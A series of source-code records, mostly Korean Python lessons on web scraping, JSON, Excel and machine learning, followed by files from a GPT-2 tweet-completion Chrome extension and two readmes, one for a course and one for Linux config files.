"content_id": "90c29a99c4973f2e2daf7de9ef6454fc7a0ef19d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1045,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 31,
"path": "/lesson107.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\n\nhtml = '''\n<html><body>\n<div id=\"meigen\">\n\t<h1>위키북스 도서</h1>\n\t<ul class=\"items art it boo\">\n\t\t<li>유니티 게임 이펙트 입문</li>\n\t\t<li>스위프트로 시작한는 아이폰 앱 개발 교과서</li>\n\t\t<li>모던 웹사이트 디자인의 정석</li>\n\t</ul>\n</div>\n</body></html>\n'''\n# 태그 선택자 : \"ul\", 'div', 'li'\n# 아이디 선택자 : #id => 하나 지정\n# 클래스 선택자 : .class => 여러개 지정 가능\n# 구조 선택자 : 후손 선택자, 자식 선택자\n# 후손 선택자 : 태그 아래의 모든 것 <html>아래의 body, h1, ul, li \"#meigen li\"\n# 자식 선택자 : 태그 바로 아래의 자식 <html>아래의 <body> 만 자식 \"ul.items > li\"\n\nsoup = BeautifulSoup(html,'html.parser')\nheader = soup.select_one('body> div > h1') # 하나 선택, 요소\nlist_items = soup.select('ul.items > li') # 여러개 선택, 요소의 배열\n\nprint(header.string)\n#header.attrs['title']\nprint(soup.select_one('ul').attrs)\n\nfor li in list_items:\n\tprint(li.string)"
},
{
"alpha_fraction": 0.5426997542381287,
"alphanum_fraction": 0.5977961421012878,
"avg_line_length": 17.200000762939453,
"blob_id": "52d2424af1aae8c88f057d0dffddefaa8ecc9fa2",
"content_id": "d72f8f118d975a9c1829bbbedf08a36c617844ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 20,
"path": "/lesson122.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import json\n\njson_str = \"\"\"[\n\t{\"name\":\"사과\",\"price\":1000},\n\t{\"name\":\"바나나\",\"price\":2000},\n\t{\"name\":\"배\",\"price\":3000},\n\t{\"name\":\"귤\",\"price\":4000},\n\t{\"name\":\"자두\",\"price\":5000}\n]\"\"\"\n\nprint('# 문자열 => 파이썬 자료형')\noutput = json.loads(json_str)\nprint(output)\nprint(type(output))\nprint()\n\nprint('# 파이썬 자료형 => JSON 문자열')\ntext = json.dumps(output)\nprint(text)\nprint(type(text))"
},
{
"alpha_fraction": 0.6540880799293518,
"alphanum_fraction": 0.6808176040649414,
"avg_line_length": 24.479999542236328,
"blob_id": "dc894afbe26eff9e1d1ce1cfdbd7a596e382b22e",
"content_id": "3ba1442b36553a8876e3173925aff6ebb0227eef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 25,
"path": "/lesson101.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n- 다운 로드 : docker pull continuumio/miniconda3\n- 실행 : docker run -it continuumio/miniconda3 /bin/bash\n- 파이썬 실행해보기 : python -c 'print(3*5)'\n- 빠져나오기 : exit\n\n- 새로운 이미지 생성 ( 컨테이너 상태 저장하기 )\n > docker run -it continuumio/miniconda3 /bin/bash\n > pip install beautifulsoup4\n > pip install requests\n > exit\n > docker ps -a\n > docker commit <컨테이너 ID> <이름>:<태그>\n > docker commit c63b5b00d942 melearn:init\n > docker run -it melearn:init\n\n- 홈폴더를 마운틴해서 사용하기\n > docker run -it -v <폴더이름>:<컨테이너의폴더> <이미지이름>:<태그이름>\n > docker run -it -v /volumn2/docker/aircomix:/park parka\n\n- synology 설정\n > LANG C.UTF-8 LC_ALL C.UTF-8\n > /docker/aircomix\n\n''')"
},
{
"alpha_fraction": 0.6977611780166626,
"alphanum_fraction": 0.7108209133148193,
"avg_line_length": 25.850000381469727,
"blob_id": "54ea888c163b30eb5f6e014748cc129c55457d91",
"content_id": "db1d8d7baacb1f5a0ab6bd5d765f2f7eb7edf568",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 558,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 20,
"path": "/lesson120.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nimport urllib.request\n\nurl = 'http://www.weather.go.kr/weather/forecast/mid-term-rss3.jsp?stnId=108'\nrequest = urllib.request.urlopen(url)\nxml = request.read()\n\nsoup = BeautifulSoup(xml,'html.parser')\n\nfor location in soup.findAll('location'):\n\tprint(location.city.string)\n\tprint('-'*20)\n\n\tfor data in location.findAll('data'):\n\t\tprint('시간 :',data.tmef.string)\n\t\tprint('날씨 :',data.wf.string)\n\t\tprint('최저 :',data.tmn.string)\n\t\tprint('최고 :',data.tmx.string)\n\t\tprint('신뢰도 :',data.reliability.string)\n\t\tprint()"
},
{
"alpha_fraction": 0.642201840877533,
"alphanum_fraction": 0.6811926364898682,
"avg_line_length": 19.809524536132812,
"blob_id": "24a31ee269fdc2155a47bd9ae87a703113c7481f",
"content_id": "44d620ae45ae92ca90e3f555c2f296814e552bbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 504,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 21,
"path": "/lesson127.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n[ xls 사용 ]\n- 자료 다운로드 : http://www.index.go.kr/potal/main/EachDtlPageDetail.do?idx_cd=1041\n- 받은 자료 최근 통합자료로 새이름 저장\n- pip install openpyxl\n''')\n\nimport openpyxl\n\nbook = openpyxl.load_workbook('stats_104102.xlsx')\n\n# 첫 번째 방법 \nprint(book.get_sheet_names())\nprint(book.get_sheet_by_name('stats_104102'))\n\n# 두 번째 방법\nsheet = book.worksheets[0]\nfor row in sheet.rows:\n\tfor data in row:\n\t\tprint(data.value, end=\" \")\n\tprint(\"\",end=\"\\n\")"
},
{
"alpha_fraction": 0.654618501663208,
"alphanum_fraction": 0.6987951993942261,
"avg_line_length": 19.83333396911621,
"blob_id": "e85d159c85867ec5491538f54038f79eaf076ef1",
"content_id": "82f825c394f12922e36e08846e5ea96db795dff4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 279,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 12,
"path": "/lesson128.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import openpyxl\n\nworkbook = openpyxl.Workbook() \nsheet = workbook.active\n\n# 데이터 쓰기\nsheet['A1'] = '테스트 파일'\nsheet['B2'] = '안녕하세요'\nsheet.merge_cells('A1:C1')\nsheet['A1'].font = openpyxl.styles.Font(size=20,color='FF0000')\n\nworkbook.save('newFile.xlsx')"
},
{
"alpha_fraction": 0.4465116262435913,
"alphanum_fraction": 0.45116278529167175,
"avg_line_length": 16.95833396911621,
"blob_id": "0a24e51a600a8da057c23d4becbcd965e9220d2a",
"content_id": "72a479eec498f152721e4705c4829da6328ac816",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 660,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 24,
"path": "/lesson118.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n[ XML ]\n- 여는 태그와 닫는 태그\n > <태그></태그> # 요소(element)\n > <태그 />\n- 콘텐츠\n > <태그>{{콘텐츠}}</태그>\n > <태그>\n \t\t\t<태그>{{콘텐츠}}</태그>\n\t\t\t<태그>{{콘텐츠}}</태그>\n </태그>\n- 속성\n > <태그 속성='값' 속성='값' 속성='값'>{{콘텐츠}}</태그>\n > <태그 속성='값' 속성='값' 속성='값' />\n > \"\" => 문자열\n- 루트 태그는 하나 : 가장 위에 있는 태그\n\t<rss version=\"2.0\"> # 루트 태그\n\t\t<hannel>\n\t\t\t<title>\t</title>\n\t\t\t<description> </description>\n\t\t</hannel>\n\t</rss>\n- <![CDATA[문장]]> : 문장의 내용이 길 때 문장 보호를 위해 사용\n''')"
},
{
"alpha_fraction": 0.6608695387840271,
"alphanum_fraction": 0.6840579509735107,
"avg_line_length": 22.066667556762695,
"blob_id": "cd593e3a52e74c393beae18ec6b1c93c58f5f19b",
"content_id": "79ded9beea3965dd1ef678f5bb68b6476802658b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 351,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 15,
"path": "/lesson132.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from sklearn import svm, metrics\nimport pandas\n\ncsv = pandas.read_csv('iris_a.csv')\ndata = csv[['SepalLength','SepalWidth','PetalLength','PetalWidth']]\nlabel = csv['Name']\nsample = [[5.1, 3.0, 1.3, 0.2]]\n\nclf = svm.SVC()\nclf.fit(data,label)\nresults = clf.predict(sample)\nprint(results)\n\n# score = metirics.accuracy_score()\n# print('정답률 :',score)"
},
{
"alpha_fraction": 0.36882129311561584,
"alphanum_fraction": 0.46768060326576233,
"avg_line_length": 13.666666984558105,
"blob_id": "ca94a0c605c3e66a5bdd0b636e3f86505c968778",
"content_id": "560980bf705b185a9897e947e463c7a8fbeb3b28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 315,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 18,
"path": "/lesson121.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n[ JSON ]\n- JavaScript Object Notation\n- 자료형\n > 숫자 : 10, 52.273\n > 문자열 : \"제품\", \"1020203\"\n > 불 : true, false\n > null : null\n > 배열 : [10, 273, \"안녕하세요\", true]\n > 객체 : \n\t {\n\t\t\"키A\":273,\n\t\t\"키B\":\"값\",\n\t\t\"키C\":true,\n\t\t\"키D\":[12,52],\n\t\t\"키E\":{\"name\":\"park\"},\n\t }\n''')"
},
{
"alpha_fraction": 0.6746987700462341,
"alphanum_fraction": 0.6847389340400696,
"avg_line_length": 25.263158798217773,
"blob_id": "0b42d9c88c905d419b2c2b1d50da7634bf25aa8d",
"content_id": "44aff58d01bd23905b582a3d6324c45c5fe9b2e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 576,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 19,
"path": "/lesson108.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nimport urllib.request\n\nprint('네이버 시장지표 페이지 가져오기')\nurl = 'https://finance.naver.com/marketindex/'\nhtml = urllib.request.urlopen(url)\n\nsoup = BeautifulSoup(html,'html.parser')\n# soup.select_one()\nresults = soup.select('span.value')\nprint('[ 환전 고시 환율 ]')\nprint('달러 환율 =',results[0].string,'원') \nprint('엔 환율 =',results[1].string,'원') \nprint('유로 환율 =',results[2].string,'원') \nprint('중국 환율 =',results[3].string,'원') \nprint()\n\nfor result in results:\n\tprint(result.string)"
},
{
"alpha_fraction": 0.7342657446861267,
"alphanum_fraction": 0.7412587404251099,
"avg_line_length": 14.94444465637207,
"blob_id": "8b8dfd20f3b51e68daa4a0842247daa8d25363f6",
"content_id": "1a0e0b7918cfffaceb7e9e47def4122448ca582f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 360,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 18,
"path": "/lesson115.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\n\nurl = 'https://nid.naver.com/nidlogin.login'\n\n# PhantomJS 드라이버 추출하기\nbrowser = webdriver.PhantomJS()\n\n# 3초 대기하기\nbrowser.implicitly_wait(3)\n\n# url 읽어 들이기\nbrowser.get(url)\n\n# 화면을 캡처해서 저장하기\nbrowser.save_screenshot('website_b.png')\n\n# 브라우저 종료하기\nbrowser.quit()"
},
{
"alpha_fraction": 0.7111111283302307,
"alphanum_fraction": 0.7111111283302307,
"avg_line_length": 19.846153259277344,
"blob_id": "3aa9c50be360a0bdf46f8776820fdc2c4ecbe0be",
"content_id": "1da7ae30157f75bb3476f384964caa91d37fc536",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 270,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 13,
"path": "/lesson123.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import urllib.request as request\nimport json\n\njson_str = request.urlopen(\"https://api.github.com/repositories\").read()\noutput = json.loads(json_str)\n\nfor item in output:\n\tprint(item[\"name\"])\n\tprint(item[\"full_name\"])\n\tprint(item[\"owner\"][\"login\"])\n\tprint()\n\njson.dumps()"
},
{
"alpha_fraction": 0.6462264060974121,
"alphanum_fraction": 0.6462264060974121,
"avg_line_length": 26.69565200805664,
"blob_id": "cf6fe308f99c95ed840efb15aca13b67a296db33",
"content_id": "7db859364f94b5b93addd78a10337ba20a992d42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1162,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 23,
"path": "/lesson129.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n[ 웹 API(Application Programming Interface) ]\n- 어떤 사이트가 가지고 있는 기능을 외부에서도 쉽게 사용할 수 있게 공개한 것을 의미한다.\n- XML, CSV,JSON과 같은 데이터 공유를 의미\n- 일반적인 프로그램 계발 : 기획자,디자이너,계발자\n- 머신 러닝 : \n\t> 어떤 가설을 기반\n\t> 어떤 데이터를 넣었을 때\n\t> 원하는 데이터를 뽑아 내는 과정\n\t> 기획자 : 데이터가 있고 데이터를 기반으로 가설을 설정 하는 것\n\t> 계발자 : 가설을 기반으로 증명하는 사람\n\t> 디자이너 : 증명된 가설을 바탕으로 데이터 시각화하여 사람들에게 알리는 것\n- 기획에서 중요점 : 어떤 데이터를 사용하는 것 \n\t> 우리에게 필요한 데이터\n\t> 그 데이터를 어떻게 가져 올 수 있고\n\t> 그 데이터를 어떻게 조합하여 가설을 세울 수 있는가?\n- 국내 API\n\t> APISTORE : https://www.apistore.co.kr/api/apiList.do\n\t> 공공데이터포털 : https://www.data.go.kr/main.do\n- 주의 할 점\n\t> naver.com/robots.txt\n\t\t- User-agent:* Disallow: / 어떠한 사용자도 허가 하지 않음\n''')"
},
{
"alpha_fraction": 0.6409638524055481,
"alphanum_fraction": 0.6554216742515564,
"avg_line_length": 20.894737243652344,
"blob_id": "f785b5ba211ea954c748b6f60dd3eb9dffdd3b38",
"content_id": "99fa2c169d49472e437c68b0376a6f1d68bfc6fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 19,
"path": "/lesson106.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import urllib.request\nimport urllib.parse\n\napi = 'https://search.naver.com/search.naver'\nvalues={\n\t'sm':'tab_sug.top',\n\t'where':'kin',\n\t'query':'초콜릿' # %EC%B4%88%EC%BD%9C%EB%A6%BF\n}\n\nparams = urllib.parse.urlencode(values) # 요청 매개 변수\nurl = api + '?' + params\nprint('ape =',api)\nprint('params =',params)\nprint('url =', url)\n\ndata = urllib.request.urlopen(url).read()\ntext = data.decode('utf-8') # euc-kr\nprint(text)"
}
] | 29 |
aliva/docker-py | https://github.com/aliva/docker-py | 40ec0e3c849bde73244631ece68be0d5d594cc0c | ea728c1bd5e495fe7afc0a3550e90c8acd6a51ff | d94f7179270d80d0c049591f3bc0841d6aeb3e1b | refs/heads/master | 2019-07-05T08:13:32.974548 | 2014-06-22T16:40:28 | 2014-06-22T16:40:28 | 21,091,396 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5220500826835632,
"alphanum_fraction": 0.5411204099655151,
"avg_line_length": 33.95833206176758,
"blob_id": "81cf730cdd96b98ff6da00b55bce069ed3848f54",
"content_id": "809336bcf5ee2d857db86486f03580a11b1f6bc7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 839,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 24,
"path": "/tests/utils_test.py",
"repo_name": "aliva/docker-py",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom docker.utils import parse_repository_tag\n\n\nclass UtilsTest(unittest.TestCase):\n\n def test_parse_repository_tag(self):\n self.assertEqual(parse_repository_tag(\"root\"),\n (\"root\", None))\n self.assertEqual(parse_repository_tag(\"root:tag\"),\n (\"root\", \"tag\"))\n self.assertEqual(parse_repository_tag(\"user/repo\"),\n (\"user/repo\", None))\n self.assertEqual(parse_repository_tag(\"user/repo:tag\"),\n (\"user/repo\", \"tag\"))\n self.assertEqual(parse_repository_tag(\"url:5000/repo\"),\n (\"url:5000/repo\", None))\n self.assertEqual(parse_repository_tag(\"url:5000/repo:tag\"),\n (\"url:5000/repo\", \"tag\"))\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.6903553009033203,
"alphanum_fraction": 0.7225042581558228,
"avg_line_length": 18.700000762939453,
"blob_id": "30ac2b15c8c4ce89e48f89a39ec91db02ce3ec7a",
"content_id": "8d46e8aa7874f7280fffcc39814b56d83ab9df0b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 591,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 30,
"path": "/tox.ini",
"repo_name": "aliva/docker-py",
"src_encoding": "UTF-8",
"text": "[tox]\nenvlist = py26, py27, py32, py33, py34, flake8\nskipsdist=True\n\n[testenv:py26]\nusedevelop=True\ncommands =\n {envpython} tests/test.py\ndeps =\n -r{toxinidir}/requirements.txt\n -r{toxinidir}/test-requirements.txt\n\n[testenv:py27]\nusedevelop=True\ncommands =\n {envpython} tests/test.py\ndeps =\n -r{toxinidir}/requirements.txt\n -r{toxinidir}/test-requirements.txt\n[testenv]\nusedevelop=True\ncommands =\n {envpython} tests/test.py\ndeps =\n -r{toxinidir}/requirements3.txt\n -r{toxinidir}/test-requirements.txt\n\n[testenv:flake8]\ncommands = flake8 docker tests\ndeps = flake8\n"
}
] | 2 |
yizenglistat/cs224n-natural-language-processing-with-deep-learning | https://github.com/yizenglistat/cs224n-natural-language-processing-with-deep-learning | e1fbd12558230b7deaef92630e14ef68f246af31 | a3db0f5e49b7e894e90144625179ec3326cc5c44 | 962758c093a256790dc64a26cf0ac3d1ae533a22 | refs/heads/master | 2020-12-19T10:23:42.458967 | 2020-01-23T02:08:45 | 2020-01-23T02:08:45 | 235,706,504 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.774193525314331,
"alphanum_fraction": 0.8494623899459839,
"avg_line_length": 46,
"blob_id": "e6ea6d3473fadc74f1acd175c467e13f7e47e84b",
"content_id": "90fdd4398e8077ea8a1260efc2ec9b426dbd8fc0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 2,
"path": "/readme.md",
"repo_name": "yizenglistat/cs224n-natural-language-processing-with-deep-learning",
"src_encoding": "UTF-8",
"text": "# Winter 2020 CS224n: Natural Language Processing with Deep Learning\nCoursework from Stanford"
},
{
"alpha_fraction": 0.8035714030265808,
"alphanum_fraction": 0.8035714030265808,
"avg_line_length": 18,
"blob_id": "283c88d58ec0279a72b3e93c243d533d2dc3f37f",
"content_id": "e2ca7415fe987e14494033dc20581f1b1c3f04df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 56,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 3,
"path": "/test.py",
"repo_name": "yizenglistat/cs224n-natural-language-processing-with-deep-learning",
"src_encoding": "UTF-8",
"text": "#python script\nimport numpy as np \nimport seaborn as sns"
}
] | 2 |
d1shs0ap/tweeter | https://github.com/d1shs0ap/tweeter | f5d2e92b8ba6f3c2e9dfee46abac4bebfabcaeb7 | 9fd60a19b28061596339577b78dd831edcc67511 | 1533a1ae46364886d4c2665e4bb1c392865be373 | refs/heads/master | 2023-02-05T01:00:19.697135 | 2020-12-20T14:27:30 | 2020-12-20T14:27:30 | 288,544,418 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6101398468017578,
"alphanum_fraction": 0.617132842540741,
"avg_line_length": 23.869565963745117,
"blob_id": "bbd27b04630813211eb3b539e2977b26b1a2f5ce",
"content_id": "da2f367fa61cd0a1b74d30d58ff9ab82c78b6b16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 572,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 23,
"path": "/api/main.py",
"repo_name": "d1shs0ap/tweeter",
"src_encoding": "UTF-8",
"text": "from flask import Flask, request, jsonify, render_template\nfrom flask_cors import CORS, cross_origin\nimport predictor\n\napp = Flask(__name__)\nCORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\[email protected]('/', methods=['POST', 'GET'])\n@cross_origin()\ndef home():\n if request.method == 'POST':\n req = request.json\n print(req)\n content = req['text']\n res = predictor.predict(content)\n return jsonify({'generatedText': res})\n else:\n return jsonify({'generatedText': 'hi'})\n\n\nif __name__ == \"__main__\":\n app.run(port=7000)\n"
},
{
"alpha_fraction": 0.6261090040206909,
"alphanum_fraction": 0.6425855755805969,
"avg_line_length": 29.384614944458008,
"blob_id": "55f54d37c30edc16c935cf0af615fa79e790c2b9",
"content_id": "56b4e6d6b68fa7c84723aac517dcb7eac87bc954",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 789,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 26,
"path": "/chrome/background.js",
"repo_name": "d1shs0ap/tweeter",
"src_encoding": "UTF-8",
"text": "// here background needs to send gpt2 generated response back to content.js\n\n// receive message from content\nchrome.runtime.onMessage.addListener(function (request, sender, sendResponse) {\n\n // compute gpt2 reesponse using endpoint\n fetch('http://127.0.0.1:7000/', {\n method: 'POST',\n headers: {\n 'Content-type': 'application/json'\n },\n body: JSON.stringify({text: request.text}),\n })\n .then(response => response.json())\n .then(data => {\n console.log('Success:', data);\n\n // send response back to content script\n chrome.tabs.query({active: true, currentWindow: true}, function(tabs) {\n chrome.tabs.sendMessage(tabs[0].id, { generatedText: data.generatedText });\n });\n })\n .catch((error) => {\n console.error('Error:', error);\n });\n})"
},
{
"alpha_fraction": 0.5891203880310059,
"alphanum_fraction": 0.6064814925193787,
"avg_line_length": 26,
"blob_id": "d9c33f7453287d4bcc499a8fd3ab8d3300057c55",
"content_id": "889b9005a59b24ae94eb5827e5679a92775774c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 864,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 32,
"path": "/api/predictor.py",
"repo_name": "d1shs0ap/tweeter",
"src_encoding": "UTF-8",
"text": "from transformers import GPT2LMHeadModel, GPT2Tokenizer\nimport torch\n\n\ntokenizer = GPT2Tokenizer.from_pretrained('gpt2-xl')\nmodel = GPT2LMHeadModel.from_pretrained('gpt2-xl')\n\n\ndef predict(text):\n generated = tokenizer.encode(text)\n context = torch.tensor([generated])\n past = None\n output_cap = 20\n sentences_left = 1\n\n while output_cap > 0:\n print(output_cap)\n output, past = model(context, past=past)\n token = torch.argmax(output[..., -1, :])\n generated += [token.tolist()]\n context = token.unsqueeze(0)\n\n cur_token = tokenizer.decode([token.tolist()])\n if cur_token == '.' or cur_token == '!' or cur_token == '?':\n sentences_left -= 1\n if sentences_left <= 0:\n break\n\n output_cap -= 1\n\n sequence = tokenizer.decode(generated)\n return sequence\n"
},
{
"alpha_fraction": 0.8181818127632141,
"alphanum_fraction": 0.8363636136054993,
"avg_line_length": 54,
"blob_id": "773e3a01df229498d207d9e5a614b07f30f8af99",
"content_id": "1d4777fdd95f9cbbaeb48d48de5274103ef92931",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 1,
"path": "/README.md",
"repo_name": "d1shs0ap/tweeter",
"src_encoding": "UTF-8",
"text": "Tweet completer that would complete tweets using GPT2.\n"
},
{
"alpha_fraction": 0.6663163304328918,
"alphanum_fraction": 0.6731476783752441,
"avg_line_length": 31.810344696044922,
"blob_id": "d11bfbd6d14acde257ac1732eb51d68745b07a61",
"content_id": "08b05be4831a91d9942e18b33c78448f34733f44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1905,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 58,
"path": "/chrome/inject.js",
"repo_name": "d1shs0ap/tweeter",
"src_encoding": "UTF-8",
"text": "var textbar = (document.getElementsByClassName('DraftEditor-editorContainer')[0]).firstChild.firstChild.lastChild.firstChild.firstChild;\nlet textbarRect = textbar.getBoundingClientRect();\n\nvar span=document.createElement(\"span\");\ndocument.body.appendChild(span);\nspan.textContent='';\nspan.style.left=`${textbarRect.right}px`;\nspan.style.top=`${textbarRect.bottom}px`;\nspan.style.fontSize='19px';\nspan.style.fontFamily=\"Helvetica, sans-serif\";\nspan.style.position='absolute';\nspan.style.backgroundColor='#E6E6FA';\n\nlet timer = setTimeout(()=>{}, 0);\n\nlet withoutSpaceSpan;\n\n\n// updates whenever textbox changes\ntextbar.addEventListener('DOMSubtreeModified', () => {\n textbarRect = textbar.getBoundingClientRect();\n span.style.left=`${textbarRect.right}px`;\n span.style.top=`${textbarRect.bottom}px`;\n span.textContent='⏳';\n clearTimeout(timer);\n timer = setTimeout(() => {\n // sends typed text to content script\n if(textbar.textContent){\n window.dispatchEvent(new CustomEvent('getTypedText', {detail: textbar.textContent}));\n }\n }, 1000);\n});\n\n// receive generated text (by gpt2) from content script\nwindow.addEventListener('getGeneratedText', (event) => {\n // displays it\n const curLen = textbar.textContent.length;\n\n if (textbar.textContent == event.detail.substr(0, curLen)){\n if(event.detail[curLen]==' ') {\n span.textContent = '\\xa0' + event.detail.substr(curLen);\n } else {\n span.textContent = event.detail.substr(curLen);\n }\n withoutSpaceSpan = event.detail.substr(curLen);\n }\n \n}, false);\n\nwindow.addEventListener(\"keydown\", event => {\n if(event.key=='Tab'){\n event.preventDefault();\n if(span.textContent){\n textbar.textContent += withoutSpaceSpan;\n textbar.selectionStart = textbar.selectionEnd = textbar.value.length;\n }\n }\n})\n"
}
] | 5 |
davebs/daves-linux-configs | https://github.com/davebs/daves-linux-configs | 0605b4fb1b4373a395e74bfb80cbe4e49e87202c | ec321f18dd5f1648064f13290e7a56c1939f7141 | 5ab917ec76f6043b31647d2f9f037e366f114bcc | refs/heads/master | 2022-04-30T22:37:00.583620 | 2022-04-11T06:13:23 | 2022-04-11T06:13:23 | 96,241,541 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7482210993766785,
"alphanum_fraction": 0.7553366422653198,
"avg_line_length": 57.935482025146484,
"blob_id": "26d2c2bc922875cf350507ff1144f07c3ff91018",
"content_id": "ee43edc8877b5ee15d2312ecb013468906e47e67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1827,
"license_type": "no_license",
"max_line_length": 259,
"num_lines": 31,
"path": "/README.md",
"repo_name": "davebs/daves-linux-configs",
"src_encoding": "UTF-8",
"text": "## Dave Sullivan's Linux Config Files\n\nI end up needing these every time I install a fresh linux system. These are config files I use for vim, tmux, i3gaps, and compton. \n\nThey are decent config files, I think, honed after years of use. They are tailored to the way I work, so your mileage may vary.\n\n### Requirements\n\n#### tmux\nThe tmux config provided should pretty much just work. Put it in your home directory and call it ```.tmux.conf``` (notice the pre-pended dot)\n\n#### vim\nYou need to install vundle for the plugins to work. Otherwise just rename it to ```.vimrc``` and put it in your home directory.\n\n#### i3gaps\nYou'll need to install i3gaps. I3gaps is a fork of i3 that does everything i3 does but adds GAPS (such as those seen in AwesomeWM) around the window panels. This lets you see more of the desktop background and gives it a unique minimalist-but-functional look.\n\nThe i3 folder in this repo should be moved to your home directory and renamed ```.i3```\n\nAlso install ```feh``` and ```pasystray``` because they are used to change the background (which you should change to one of your choice) and adjust audio from the system tray (respectively).\n\n#### compton\nCompton is like compiz but not. I use it for window transparency effects. \nWhen you switch selected panels in i3, it adjusts the transparency of the inactive windows and dims them a bit. \n\nIt's a pretty cool and practical effect, particularly if you're making the bold decision to go \"borderless\" in i3. Totally bad ass. Worth setting up. \n\n*Note: The i3config restarts compton for you and reloads its config file every time you reload i3 (as opposed to only starting it at login).*\n\n#### rofi\nYou'll want to install rofi because that's what I use instead of dmenu in my i3 config. Rofi is a search-as-you-type program launcher kind of like OSX spotlight.\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.6458333134651184,
"avg_line_length": 20.33333396911621,
"blob_id": "f5a05178e66d52cc31b76bcba21e40c6ba4d6457",
"content_id": "611e3825d47559c51db7921b8211fdb5b093bf7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/i3gaps/custom_status.sh",
"repo_name": "davebs/daves-linux-configs",
"src_encoding": "UTF-8",
